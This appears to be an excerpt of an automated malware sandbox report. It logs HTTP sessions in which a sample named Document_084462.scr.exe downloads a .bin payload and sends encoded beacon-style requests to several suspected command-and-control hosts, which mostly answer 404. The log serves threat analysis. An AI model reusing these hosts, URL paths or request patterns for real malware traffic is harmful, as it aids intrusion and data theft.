                                                                            Data Raw: 32 4f 3d 65 4f 72 4a 43 76 6d 61 42 4f 36 47 73 67 74 5a 6c 76 54 59 77 75 39 2f 44 52 59 48 66 76 6c 63 6d 4c 33 38 37 4d 41 6b 61 66 6b 31 2b 59 55 38 79 71 35 43 68 2b 54 70 4e 7a 52 4d 4d 31 36 73 37 72 36 4b 41 55 56 45 72 56 32 55 48 72 57 53 63 66 43 36 66 30 38 30 7a 78 59 77 55 76 63 7a 6c 64 71 77 44 46 2f 6e 37 30 4b 50 64 4a 4c 49 38 33 6f 39 33 48 4c 77 58 74 66 53 4a 36 33 78 67 58 79 77 66 44 56 2b 58 52 6e 54 75 44 38 50 34 73 33 2b 73 6e 78 64 62 52 5a 46 41 4a 43 58 6b 5a 57 73 4e 68 44 71 56 77 65 34 30 32 6f 39 6d 30 38 6f 63 65 58 4a 6b 68 2b 72 6d 5a 65 56 50 2f 43 71 53 35 6b 34 31 6f 42 32 78 76 58 6c 42 6c 47 77 4d 2f 38 65 48 56 79 74 49 75 5a 59 69 74 33 47 44 35 6d 37 38 44 48 6c 62 48 74 62 4b 62 48 74 59 34 75 43 41 32 39 73 45 49 32 61 54 62 38 4f 6f 6c 78 6e 72 43 6e 36 48 6c 46 6a 55 75 68 6c 4a 4f 62 6f 73 49 37 78 47 2b 74 71 65 38 4a 33 77 4c 68 61 73 57 73 6e 70 52 4f 2b 6f 66 4c 51 78 43 42 7a 46 4c 4f 4d 79 48 4b 7a 39 6b 33 63 33 59 54 61 63 4a 38 53 53 4f 6e [TRUNCATED]
                                                                            Data Ascii: 2O=eOrJCvmaBO6GsgtZlvTYwu9/DRYHfvlcmL387MAkafk1+YU8yq5Ch+TpNzRMM16s7r6KAUVErV2UHrWScfC6f080zxYwUvczldqwDF/n70KPdJLI83o93HLwXtfSJ63xgXywfDV+XRnTuD8P4s3+snxdbRZFAJCXkZWsNhDqVwe402o9m08oceXJkh+rmZeVP/CqS5k41oB2xvXlBlGwM/8eHVytIuZYit3GD5m78DHlbHtbKbHtY4uCA29sEI2aTb8OolxnrCn6HlFjUuhlJObosI7xG+tqe8J3wLhasWsnpRO+ofLQxCBzFLOMyHKz9k3c3YTacJ8SSOn8LVNDCj9QnVAPQCu3vKGrIloMv63OMz2j2LHy7EJdRitDHxDyU+YR/nGn+g0iPMaJsGdaLXBE5ngtrEzXBTGqk6S+l2okZyUyGdZOijBbkmWA9I60T9rkDsvCba5j2SQSfTgyq/bwQsPMum1uGoCopeE5AZecxb8MoMWVge6syIYX9gy69xXJ/FeANLtyD9ugVCOZGgzhOWzVKjMK/5scA5ipxL7qCJj/ErowVIEHbYpFKFkk0PB4R3lAIDkfg0qqaeMaWl6mdXymtxjkaYOaQaD1Cm9lzLFf/ws8lhC949uQFl55VfhyhIcwmCFnF5txNVMUbWJZ4n/HBAD1tiZkbThMhw8qlMNB6gpwnfJBocoxUz3JXWl1T+58IQkKuPvMvzojvj
                                                                            Dec 3, 2024 19:00:18.272135973 CET2578OUTData Raw: 73 78 59 4e 6f 6b 46 36 47 70 59 43 39 4d 71 69 5a 46 75 64 39 71 71 56 37 34 57 55 54 53 4f 72 63 4f 6d 63 4e 4f 51 51 4f 45 31 78 59 63 56 6c 63 48 4a 4c 74 4f 49 36 61 36 39 53 35 70 44 56 4d 41 39 38 2f 73 50 6c 33 32 4f 4b 34 50 70 74 68 54
                                                                            Data Ascii: sxYNokF6GpYC9MqiZFud9qqV74WUTSOrcOmcNOQQOE1xYcVlcHJLtOI6a69S5pDVMA98/sPl32OK4PpthTVjsQ4AID0k8/+Z+Exm6aUxJRES+RN5fmaPxvW5Pq3pmrUxE9++I/4gMvJcD9Vgd+DEVGq7InWEQuXZdSxPFcSUlUQzSIa4wJZxkKadRuDLjfGvabPn9dHqHN2b9rqh1DHByiypOZed8yjq4qOMrO9nJw0UJEZJdkz
                                                                            Dec 3, 2024 19:00:18.272186995 CET4060OUTData Raw: 70 42 2b 43 2f 58 45 6c 6a 4c 66 46 68 72 4a 2f 48 70 30 4b 36 6d 4e 6a 34 41 71 75 4f 4e 75 30 6c 6c 4d 63 4c 2f 4d 37 53 41 37 64 72 50 36 2b 6c 46 4a 6e 70 52 6b 77 39 6b 4c 42 59 6f 4e 5a 58 41 6b 35 2b 52 49 45 45 34 61 77 71 45 50 48 52 36
                                                                            Data Ascii: pB+C/XEljLfFhrJ/Hp0K6mNj4AquONu0llMcL/M7SA7drP6+lFJnpRkw9kLBYoNZXAk5+RIEE4awqEPHR6H3BxEmuFrT25EBvA7XPAVA0NfLwJbxJ78FRSSrMO6L0rss6agzwoKTHhKWN6A3MRRcxv82y4fEFhGfV4hC4d7cYSFUqh8Hw0MQIrfHYgVQ1BGtISdPoN8XyMSpf55k7THOsknkd5ir7pvGsGOnOyECLRTXXBIB3cg
                                                                            Dec 3, 2024 19:00:18.603387117 CET427INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 18:00:18 GMT
                                                                            Server: Apache
                                                                            Content-Length: 263
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            81192.168.11.2049834101.35.209.18380
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 19:00:21.134114027 CET487OUTGET /31pt/?2O=TMDpBYanOquY9Rx47rOd3KwxNkoHefYhv73C9/MKdrwqjZcj4ORMyeHFBityLVio1oCUCVJYl2rwHayMePC/S1ZjuitrANQdk8OOJhWAxEqHZ6TqwRsh8gk=&ChhG6=J-xs HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.yc791022.asia
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 19:00:21.476221085 CET427INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 18:00:21 GMT
                                                                            Server: Apache
                                                                            Content-Length: 263
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            82192.168.11.204983538.47.232.20280
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 19:00:26.854875088 CET746OUTPOST /p3j6/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.43kdd.top
                                                                            Origin: http://www.43kdd.top
                                                                            Referer: http://www.43kdd.top/p3j6/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 44 58 35 57 42 7a 37 50 69 38 6b 64 6a 32 32 64 54 45 62 59 49 73 5a 48 6e 75 79 6b 64 4b 72 34 55 6c 42 61 55 39 79 4c 68 54 6a 71 35 63 6f 7a 71 33 76 45 2f 32 56 4c 53 57 65 4f 33 4f 4e 37 62 36 7a 78 49 49 6e 75 58 78 66 41 36 65 41 58 2f 6d 48 49 41 57 7a 41 52 6a 4f 37 36 74 34 33 75 49 59 6e 43 4d 52 52 36 43 50 51 30 6b 6e 4a 72 49 47 4d 71 4b 61 6f 5a 53 63 39 62 79 52 57 65 71 49 71 2b 6a 76 57 78 4e 79 6b 67 67 51 6e 64 6d 78 57 38 32 44 49 53 4c 59 32 74 36 54 41 37 4b 71 44 44 76 4a 4e 57 30 38 42 30 6a 64 38 4c 4f 5a 6d 30 6b 41 7a 47 38 77 37 4d 4f 6b 6f 31 67 3d 3d
                                                                            Data Ascii: 2O=DX5WBz7Pi8kdj22dTEbYIsZHnuykdKr4UlBaU9yLhTjq5cozq3vE/2VLSWeO3ON7b6zxIInuXxfA6eAX/mHIAWzARjO76t43uIYnCMRR6CPQ0knJrIGMqKaoZSc9byRWeqIq+jvWxNykggQndmxW82DISLY2t6TA7KqDDvJNW08B0jd8LOZm0kAzG8w7MOko1g==
                                                                            Dec 3, 2024 19:00:27.215039968 CET312INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 18:00:27 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 148
                                                                            Connection: close
                                                                            ETag: "66df9b06-94"
                                                                            Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            83192.168.11.204983638.47.232.20280
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 19:00:29.745966911 CET766OUTPOST /p3j6/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
                                                                            Host: www.43kdd.top
                                                                            Origin: http://www.43kdd.top
                                                                            Referer: http://www.43kdd.top/p3j6/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 44 58 35 57 42 7a 37 50 69 38 6b 64 6a 56 75 64 52 6a 76 59 63 38 5a 45 69 75 79 6b 48 36 72 6b 55 6c 4e 61 55 34 4b 6c 68 68 33 71 35 38 59 7a 6c 57 76 45 36 32 56 4c 64 47 65 4c 36 75 4e 4b 62 36 75 4f 49 4c 2f 75 58 78 4c 41 36 66 77 58 38 56 76 4c 42 47 7a 65 61 44 4f 6c 6e 64 34 33 75 49 59 6e 43 4d 30 36 36 43 58 51 31 51 6a 4a 35 35 47 50 6e 71 61 72 51 79 63 39 4d 69 52 53 65 71 4a 4e 2b 69 79 65 78 4f 61 6b 67 69 49 6e 64 54 4e 56 7a 32 44 4b 57 4c 59 70 6a 34 57 7a 6a 2b 61 6f 56 50 39 77 59 58 34 4e 34 56 51 6d 57 38 74 43 33 33 63 42 43 4d 4a 54 4f 4d 6c 7a 6f 6c 36 66 4e 36 50 6c 75 32 53 46 49 49 38 75 47 56 6a 6f 39 58 63 3d
                                                                            Data Ascii: 2O=DX5WBz7Pi8kdjVudRjvYc8ZEiuykH6rkUlNaU4Klhh3q58YzlWvE62VLdGeL6uNKb6uOIL/uXxLA6fwX8VvLBGzeaDOlnd43uIYnCM066CXQ1QjJ55GPnqarQyc9MiRSeqJN+iyexOakgiIndTNVz2DKWLYpj4Wzj+aoVP9wYX4N4VQmW8tC33cBCMJTOMlzol6fN6Plu2SFII8uGVjo9Xc=
                                                                            Dec 3, 2024 19:00:30.111435890 CET312INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 18:00:29 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 148
                                                                            Connection: close
                                                                            ETag: "66df9b06-94"
                                                                            Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            84192.168.11.204983738.47.232.20280
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 19:00:32.616333961 CET2578OUTPOST /p3j6/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.43kdd.top
                                                                            Origin: http://www.43kdd.top
                                                                            Referer: http://www.43kdd.top/p3j6/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 44 58 35 57 42 7a 37 50 69 38 6b 64 6a 56 75 64 52 6a 76 59 63 38 5a 45 69 75 79 6b 48 36 72 6b 55 6c 4e 61 55 34 4b 6c 68 68 50 71 35 76 51 7a 6b 31 33 45 39 32 56 4c 65 47 65 4b 36 75 4e 54 62 36 32 43 49 4d 33 55 58 7a 7a 41 37 38 6f 58 33 45 76 4c 50 47 7a 65 56 6a 4f 34 36 74 34 69 75 4a 6f 38 43 4d 45 36 36 43 58 51 31 57 50 4a 37 6f 47 50 30 61 61 6f 5a 53 63 4c 62 79 52 32 65 72 74 33 2b 69 47 4f 77 2b 36 6b 67 43 59 6e 4f 52 6c 56 73 47 44 45 62 72 5a 38 6a 35 71 73 6a 34 2b 6b 56 50 49 56 59 55 49 4e 70 69 4e 4b 47 34 6f 55 6b 6b 59 57 4b 34 4a 32 4d 2b 6b 69 6c 55 79 51 44 4a 62 52 78 51 53 44 4c 4b 67 30 66 47 72 35 6f 44 6b 71 66 62 2f 43 4a 4f 5a 42 64 46 50 43 42 6f 59 61 62 43 53 31 79 6d 54 7a 64 72 37 55 6e 76 6c 59 64 35 59 52 78 54 4d 77 65 79 7a 67 45 46 72 70 50 45 63 52 43 34 61 5a 63 2f 4a 54 46 56 72 37 58 7a 75 39 43 6f 68 2f 54 42 2f 30 4d 36 51 43 6f 2b 30 54 32 39 4d 63 79 67 39 39 79 64 55 6e 6b 77 30 55 52 65 58 34 59 41 71 58 2b 56 41 6a 6d 6c 43 6c 63 2b 2b [TRUNCATED]
                                                                            Data Ascii: 2O=DX5WBz7Pi8kdjVudRjvYc8ZEiuykH6rkUlNaU4KlhhPq5vQzk13E92VLeGeK6uNTb62CIM3UXzzA78oX3EvLPGzeVjO46t4iuJo8CME66CXQ1WPJ7oGP0aaoZScLbyR2ert3+iGOw+6kgCYnORlVsGDEbrZ8j5qsj4+kVPIVYUINpiNKG4oUkkYWK4J2M+kilUyQDJbRxQSDLKg0fGr5oDkqfb/CJOZBdFPCBoYabCS1ymTzdr7UnvlYd5YRxTMweyzgEFrpPEcRC4aZc/JTFVr7Xzu9Coh/TB/0M6QCo+0T29Mcyg99ydUnkw0UReX4YAqX+VAjmlClc++PEIkOW62PVndItNl5W06rreFycQ77gdJJxibRRqR1kHcrNo2itPCbnvTOhkE+qrZcYEFvO9rF0YibJ4EKsbb76L8ZIxDeZWokM5Ct3OLpAKovb3AXZzTwzgnhIA00HGwqTE+SWYHocGezh/2YH2n+O/Q9BuJeTF+RzbmHq5EAlD+M1VB3yC3IfwT0x4kjpXQktFwj5G9QhXDgcNEt6XuSaeC/FvZgHk7AGwmyW03ayf5qStkjRtXKqPApYlQTYTSERl/l8xfjOBrHJODInzXHnPZDAzi7V3jWFCugMRY32EpWDAPT98VU1dstyja03UETmtfjgrpBSx6Z4KgKEeWjiNgnrQNu44Txucal2kt1QDDu6P1DfQrHkBGlX3Un/i+nwfpsvtYKw8K51kQUlbsKHygsLVdJ0z7wRwGinyasKWBLFQKnSIMb4vnXSg/Ze7BV0zrmeRvsduaJfE8pwyFLMX9R3BOai9EdJDMxm0cKOAspUbFSFUhF+E+3weloXh1PHFFpFdg3QM5yChRLYLbDJeUfe9NOVbuT8/8BzIAzY8a6gK6UPzKCU258ZNwglQT4CCAW8t+G6tRueUFS73KYKZeelwaTP4i0CRMh2riEr7Msc3eqszoKndWqHuzgv7Yz/CMnVWEi/Q+Gc9/q8zf8NRlkWMuCUEmhg [TRUNCATED]
                                                                            Dec 3, 2024 19:00:32.616430044 CET5337OUTData Raw: 4c 53 51 50 68 62 57 70 39 6f 74 75 2b 61 59 47 48 48 77 74 39 4d 51 35 52 53 76 54 65 46 52 74 64 66 70 71 71 4b 58 53 7a 43 33 51 4f 44 76 62 75 2b 45 63 61 64 35 6b 42 2f 42 6f 67 34 4a 66 62 45 63 34 4f 70 56 63 4a 72 70 4d 46 32 59 50 7a 4f
                                                                            Data Ascii: LSQPhbWp9otu+aYGHHwt9MQ5RSvTeFRtdfpqqKXSzC3QODvbu+Ecad5kB/Bog4JfbEc4OpVcJrpMF2YPzO/Kd/HX/nItIOGIGVYH9C/x2Kt2BTiVac/cG6VcVyX7HJB/oKG29o24u2Lf6cajeHp22yZC+HY6v96K+jhsFqKoN59SoTEPVkmZgF+2RZcz3IiV60Mq0TBxul6LT95qMlh4x75wHg+GMwW1SD0JNrkGlVbXqilhMgI
                                                                            Dec 3, 2024 19:00:32.958389997 CET312INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 18:00:32 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 148
                                                                            Connection: close
                                                                            ETag: "66df9b06-94"
                                                                            Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            85192.168.11.204983838.47.232.20280
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 19:00:35.487014055 CET483OUTGET /p3j6/?2O=OVR2CF7p+NAClGW2S0P2PNgTjoCVCaKiV2x0cNqPuUjpn/Qhs1nMs1l1ZXuPw6NSEK+YKob7dwv93+8G93LPPXy+SQSX5+Y6iKJbGa1Xxz7I+GHh/5eIgvw=&ChhG6=J-xs HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.43kdd.top
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 19:00:35.826168060 CET312INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 18:00:35 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 148
                                                                            Connection: close
                                                                            ETag: "66df9b06-94"
                                                                            Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                            HTTPS Proxied Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.11.2049748122.201.127.174433396C:\Users\user\Desktop\Document_084462.scr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-03 17:54:20 UTC190OUTGET /hEuJhxvbfOcCGqtagtOtF215.bin HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                            Host: babalharra.com.au
                                                                            Cache-Control: no-cache
                                                                            2024-12-03 17:54:21 UTC249INHTTP/1.1 200 OK
                                                                            Date: Tue, 03 Dec 2024 17:54:20 GMT
                                                                            Server: Apache
                                                                            Upgrade: h2,h2c
                                                                            Connection: Upgrade, close
                                                                            Last-Modified: Tue, 03 Dec 2024 12:27:11 GMT
                                                                            Accept-Ranges: bytes
                                                                            Content-Length: 290368
                                                                            Content-Type: application/octet-stream
                                                                            2024-12-03 17:54:21 UTC7943INData Raw: 27 50 22 2e dc ef 56 fc 22 8c 52 a5 9a 77 db 7b 0c 4e e8 76 d4 a3 c6 5f 80 c3 f3 81 c1 3d 7e f3 6f 63 12 a6 ec 2b ba 44 ab 81 24 9e 47 b2 6d f5 e6 83 72 38 83 54 c2 a9 a5 74 0b ea d5 9b f8 e5 e4 da f6 16 27 52 67 68 38 44 6a 71 a8 06 60 30 60 ed b0 8a ad 4b b0 ff a3 56 b8 e1 99 2c 4e cb 90 c1 81 05 96 92 f6 77 ce 21 61 a0 fa 30 b2 db 30 5c ca 98 eb e0 a5 6f e8 be ea 35 ec 82 61 e1 a9 96 dd 67 14 33 68 b9 5e f8 62 c3 00 01 1b ba 00 0d 8e c4 09 4f 1e 2a 14 18 52 98 00 c5 6c 45 d5 8a 06 19 dd 1d 31 d7 d4 a1 ff 5f fb 3d ac 67 14 58 72 a1 bb 27 58 78 68 d1 4b 2f bc 7f 3f 54 4b c9 79 6e 43 96 44 4f f9 0e e0 42 22 81 6b 03 4b 07 30 61 f0 c4 4e f2 74 e2 0b 6e 22 53 10 1e dc 9e 88 b0 87 47 39 9b d9 e2 7f ee 8c db d4 39 7c d8 54 a6 86 0f 8a 24 69 66 bc f8 21 80 1c
                                                                            Data Ascii: 'P".V"Rw{Nv_=~oc+D$Gmr8Tt'Rgh8Djq`0`KV,Nw!a00\o5ag3h^bO*RlE1_=gXr'XxhK/?TKynCDOB"kK0aNtn"SG99|T$if!
                                                                            2024-12-03 17:54:21 UTC8000INData Raw: a0 80 af 24 d5 51 ac da 52 a4 e9 31 df 62 4a 21 9c b9 47 7f fd 9b 13 f8 00 18 26 a4 3d ff e0 fc fb c9 c9 71 f7 e3 8a 2b 9c f3 19 ca 96 01 8c 04 bd c1 5d 71 d1 bd 62 b8 7e 7f c8 72 57 2f 5a 05 23 a2 b9 fc 2a 1b d0 7c 72 4c cd af 3f 56 6f 27 0b 8c 7e 81 d0 61 57 ec b3 bb 8d 8e ad e3 be 0b 85 16 36 41 8f 15 be 11 7e 7f a3 b3 57 20 a8 c4 0d 81 9f 3d 28 44 8e 3a 33 80 b2 20 0d 89 02 a3 84 7f 62 33 a9 39 9c 10 79 49 2e 50 ab 23 d8 b9 e2 7e 5d 5e 6f 17 d9 12 20 32 2f c7 29 32 16 cf 29 b5 55 3d 66 34 12 8d c2 ea 3d 21 bb 1e 37 cc 25 d9 69 a5 0c b3 dc 6f 53 e3 79 68 bd aa 50 56 36 ca 82 4a 17 a1 fa 98 93 ec 30 10 fc fb 7f 32 f3 a9 ff 83 d9 39 16 d9 e2 35 55 15 29 8b 86 90 2c eb 32 9e 5c fb ab 15 6a f6 de 7e 20 7d 14 a2 c1 99 f9 7e 27 1e 56 3b fc 1b 65 ac 50 d2 5d
                                                                            Data Ascii: $QR1bJ!G&=q+]qb~rW/Z#*|rL?Vo'~aW6A~W =(D:3 b39yI.P#~]^o 2/)2)U=f4=!7%ioSyhPV6J0295U),2\j~ }~'V;eP]
